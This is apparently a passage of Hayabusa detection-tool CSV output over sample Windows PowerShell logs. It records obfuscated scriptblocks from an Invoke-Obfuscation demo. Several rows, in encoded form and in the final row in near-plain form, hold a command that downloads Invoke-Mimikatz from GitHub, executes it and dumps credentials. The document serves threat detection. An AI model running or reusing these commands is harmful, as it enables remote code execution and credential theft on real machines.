,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor""0x5d"" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{[cHAR] ( $_ -BXor""0x5d"" ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:04.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:04.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:06.877 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ 
})""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} 
+${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ 
${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:06.877 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ 
${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ 
${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:06.938 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,iex([CHar]73 +[CHar]69+[CHar]88 +[CHar]32 +[CHar]40 +[CHar]78 +[CHar]101+[CHar]119 + [CHar]45+ [CHar]79 + [CHar]98+[CHar]106+[CHar]101 +[CHar]99 +[CHar]116+ [CHar]32 +[CHar]78+[CHar]101 + [CHar]116 +[CHar]46+[CHar]87+[CHar]101 + [CHar]98+ [CHar]67 +[CHar]108 +[CHar]105+[CHar]101 + [CHar]110 + [CHar]116+ [CHar]41 + [CHar]46+ [CHar]68+ [CHar]111+ [CHar]119+ [CHar]110+[CHar]108 +[CHar]111+ [CHar]97 + [CHar]100 + [CHar]83+ [CHar]116 + [CHar]114+[CHar]105 +[CHar]110+ [CHar]103+ [CHar]40+ [CHar]39+[CHar]104 +[CHar]116 +[CHar]116+ [CHar]112 +[CHar]115 + [CHar]58+ [CHar]47+[CHar]47+[CHar]114+ [CHar]97+ [CHar]119 + [CHar]46+[CHar]103+[CHar]105+ [CHar]116 +[CHar]104 +[CHar]117+[CHar]98+[CHar]117+[CHar]115 + [CHar]101+ [CHar]114 +[CHar]99+ [CHar]111 + [CHar]110+[CHar]116 + [CHar]101 + [CHar]110+ [CHar]116 +[CHar]46+ [CHar]99 +[CHar]111 +[CHar]109 +[CHar]47 + [CHar]109 
+[CHar]97 +[CHar]116 +[CHar]116 + [CHar]105 + [CHar]102 +[CHar]101 + [CHar]115 + [CHar]116+[CHar]97+ [CHar]116+ [CHar]105+ [CHar]111 +[CHar]110 +[CHar]47+ [CHar]80+[CHar]111 + [CHar]119 +[CHar]101 + [CHar]114+ [CHar]83+ [CHar]112+[CHar]108+ [CHar]111+ [CHar]105 + [CHar]116+[CHar]47 + [CHar]109+ [CHar]97 +[CHar]115 +[CHar]116+[CHar]101 +[CHar]114 +[CHar]47+[CHar]69+[CHar]120 +[CHar]102+ [CHar]105+[CHar]108 +[CHar]116 + [CHar]114+ [CHar]97+ [CHar]116 + [CHar]105 + [CHar]111+[CHar]110+[CHar]47+[CHar]73+ [CHar]110+[CHar]118+[CHar]111+[CHar]107 +[CHar]101+[CHar]45+ [CHar]77+ [CHar]105+[CHar]109+[CHar]105 +[CHar]107+[CHar]97 + [CHar]116+[CHar]122 + [CHar]46 + [CHar]112+[CHar]115 + [CHar]49+ [CHar]39 + [CHar]41 +[CHar]59 +[CHar]32+ [CHar]73+[CHar]110+[CHar]118+ [CHar]111+ [CHar]107+[CHar]101+[CHar]45+ [CHar]77 + [CHar]105 +[CHar]109+[CHar]105+ [CHar]107 + [CHar]97+[CHar]116+[CHar]122+[CHar]32 + [CHar]45 +[CHar]68+[CHar]117 +[CHar]109+ [CHar]112 +[CHar]67+[CHar]114 +[CHar]101+[CHar]100 + [CHar]115),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.040 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.054 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = 
$_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.057 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.060 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.062 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.067 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.077 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.089 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.118 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input 
@(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.286 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.338 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"' '| FOrEAcH-ObJect { $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . 
( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.963 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ $_.lENGTh- 1 },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:26.128 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Char][iNT]$_)},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:25:04.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('IEX ('+'New'+'-Object'+' Net.Web'+'Client'+')'+'.DownloadString(oH'+'4http'+'s:'+'//raw'+'.g'+'it'+'hubuse'+'rcontent.c'+'om/m'+'at'+'tifes'+'t'+'a'+'tion/'+'Po'+'we'+'rSploit/ma'+'s'+'ter/Exfiltra'+'tion'+'/I'+'nvoke-Mimikat'+'z.ps1oH4'+'); Invoke-Mimi'+'katz -Du'+'mpCred'+'s') -REpLacE 
